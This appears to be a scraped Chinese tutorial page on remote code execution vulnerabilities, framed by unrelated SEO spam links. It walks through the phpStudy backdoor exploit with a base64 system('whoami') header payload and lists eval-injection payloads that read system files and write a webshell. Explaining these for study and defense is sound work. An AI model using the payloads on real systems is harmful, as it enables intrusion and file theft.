当前位置: 首页 > news >正文

dedecms网站地图模板怎么免费推广

dedecms网站地图模板怎么,免费推广,新版阿里指数官网,如何在线实现手机版网站建设RCE 漏洞 1.漏洞描述 Remote Command/Code Execute 远程命令执行/远程代码执行漏洞 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。 2.漏洞场景 PHP 代码执行PHP 代码注入OS 命令执…

RCE 漏洞

1.漏洞描述

  • Remote Command/Code Execute

  • 远程命令执行/远程代码执行漏洞

  • 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。

2.漏洞场景

  • PHP 代码执行
  • PHP 代码注入
  • OS 命令执行
  • OS 命令注入
  • Java、Python……
  • Web 应用程序
  • 远程服务
  • 操作系统漏洞

3.漏洞原理

传入 PHP 代码执行函数的变量,客户端可控,并且没有做严格的过滤。那么攻击者可以随意输入(注入,注射,Inject)想要执行的代码,并且在服务器端执行。如果代码在服务器端执行成功,就认为存在 PHP 代码注入漏洞,也就是 RCE。

4.漏洞危害

继承当前用户权限:

  • GetShell,执行代码或命令。
  • 读写文件。
  • 反弹Shell。
  • 控制网站。
  • 控制系统。

5.漏洞评级

RCE漏洞通常被评级为高危或严重的漏洞,因为其危害性较大,能够导致系统完全被攻击者控制。

6.漏洞验证

  • phpstudy_2016-2018_rce_backdoor 漏洞复现

  • 打开 bp

    image-20231016121951332

  • 打开代理浏览器

    image-20231016122015833

  • 访问 php 页面

    image-20231016122049698

    image-20231016122109271

  • 回到 bp

    查看 http 历史,找到刚刚访问的 php 页面

    image-20231016122211545

  • 发送到 Repeater

    image-20231016122237107

  • 转到 Repeater

    image-20231016122308061

  • php 页面请求内容加

    Accept-Charset: 
    
  • 修改 Accept-Encoding,删除 deflate 前的空格

    Accept-Encoding: gzip,deflate
    
  • 将要执行的命令写入到 system(“”) 中如

    system("whoami");
    
  • Decoder 模块 base64 编码

    # 对 system("whoami") 编码
    c3lzdGVtKCJ3aG9hbWkiKTs=
    

    image-20231016121748478

  • 将编码放到 Accept-Charset:

    Accept-Charset: c3lzdGVtKCJ3aG9hbWkiKTs=
    

    image-20231016122431232

  • 点击 Send 发送

  • 查看返回的数据

  • 成功回显执行的命令

    image-20231016122527558

7.漏洞利用

代码执行漏洞的利用方式有很多种。

获取Shell,蚁剑可以直接连接。

shell: http://10.4.7.187/php/functions/eval.php
pass: code

获取当前文件的绝对路径。

?code=print(__FILE__);

读文件。

?code=print(file_get_contents('eval.php'));
?code=print(file_get_contents('c:/windows/system32/drivers/etc/hosts'));

写文件。

?code=file_put_contents('shell.php','<?php phpinfo();?>');
?code=file_put_contents(要写入的文件,要写入的内容)

8.漏洞防御

  • 尽量避免使用危险函数
  • 对用户输入的数据进行严格的验证和过滤,确保只接受预期的输入。
  • 限制应用程序或系统的权限,确保用户或攻击者无法执行危险的操作。
  • 及时更新和修复应用程序、操作系统和依赖库中的漏洞,以减少攻击面。
  • 输入验证、输出转义、防止代码注入等。

9.典型案例

  • 2017年Equifax数据泄露事件:攻击者利用RCE漏洞入侵了Equifax的服务器,窃取了超过1亿个消费者的敏感信息。
  • 2014年Shellshock漏洞:Shellshock是一个影响Bash(Unix和Linux操作系统中的一种Shell)的RCE漏洞,攻击者可以通过恶意环境变量注入恶意代码并执行任意命令。
  • 2010年Stuxnet蠕虫:Stuxnet是一种利用RCE漏洞的恶意软件,攻击了伊朗的核设施,导致严重的设备损坏。
http://www.yayakq.cn/news/923211/

相关文章:

  • 网站开发的概要设计模板什么网站可以接装修活
  • 临淄网站建设价格建设网站市场规模
  • 免费建立自己的网站百度商桥要怎么添加到网站
  • 官方网站welcome怎么注册wordpress无限加载
  • 上海建设银行网站上班时间wordpress去除标志
  • 乐山网站建设培训学校网站开发兼职
  • 怎样免费建公司网站创建一个数据库wordpress
  • 网站首页被降权的原因自适应平台网站
  • 网站四对联广告代码公司注册地址异常如何处理
  • 公司网站建设的视频教程vellum wordpress
  • 怎么快速优化网站搜狗识图
  • 网站建设三网合一是什么网络营销怎么做?
  • 福州网站设计企业网站建站拓者设计吧室内设计官网登录
  • wordpress 制作网站模板教程企业网站建设实战教程
  • 建html5网站WordPress添加评论提醒
  • 国外设计文章的网站电商服务
  • 西安做网站需要多少钱wordpress建站知乎
  • dede网站制作外包软件
  • 专门为98k做的网站网页制作工具可分为哪两大类
  • 明薇通网站建设哪家好wordpress slug translate
  • 广州活动网站设计十大卖衣服网站
  • 地方农村电商平台网站设计思路湖南竞价优化哪家好
  • 做网站对服务器什么要求高注册一个公司需要什么
  • 网站手机端页面怎么做易优cms收费吗
  • 上海知名建站公司树莓派打开wordpress
  • 查找域名关键词优化收费标准
  • 专业的网站建设服务商重庆网站制作一般多少钱
  • 常州市城投建设工程招标有限公司网站wordpress搭建影视站
  • 互联网做网站属于什么行业店务系统
  • 重庆网站seo按天计费友情链接页面